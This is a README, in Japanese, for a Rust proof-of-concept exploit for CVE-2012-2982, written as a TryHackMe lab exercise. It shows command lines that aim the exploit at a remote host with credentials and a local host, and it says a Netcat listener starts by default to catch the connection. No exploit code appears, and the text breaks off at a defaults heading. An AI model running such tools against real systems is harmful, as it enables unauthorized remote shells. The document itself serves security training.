
CVE-2012-2982 のこの PoC エクスプロイトは、TryHackMe の「Intro to PoC scripting」ルームの演習として書かれました。
ルームはこちら: https://tryhackme.com/room/intropocscripting
当初は Python で進めるつもりでしたが、代わりに Rust のスキルを練習することにしました。
また、Github 上の非 Metasploit 実装のほとんどすべてが Python であることを知り、何か新しいものを提供するのが面白いかもしれないと考えました。
注: プログラムはデフォルトで Netcat リスナーを起動します。
Netcat がパスにない場合、または独自のリスナーを実行したい場合は、-d フラグを付けてプログラムを実行してください。
ソースから (Rust と Cargo が必要):
# To get detailed info about arguments:
cargo run -- --help
# General command structure:
cargo run -- <rhost> <lhost> <username> <password> [options]
バイナリから:
# To get detailed info about arguments:
./cve-2012-2982 --help
# General command structure:
./cve-2012-2982 <rhost> <lhost> <username> <password> [options]
プログラムのデフォルト: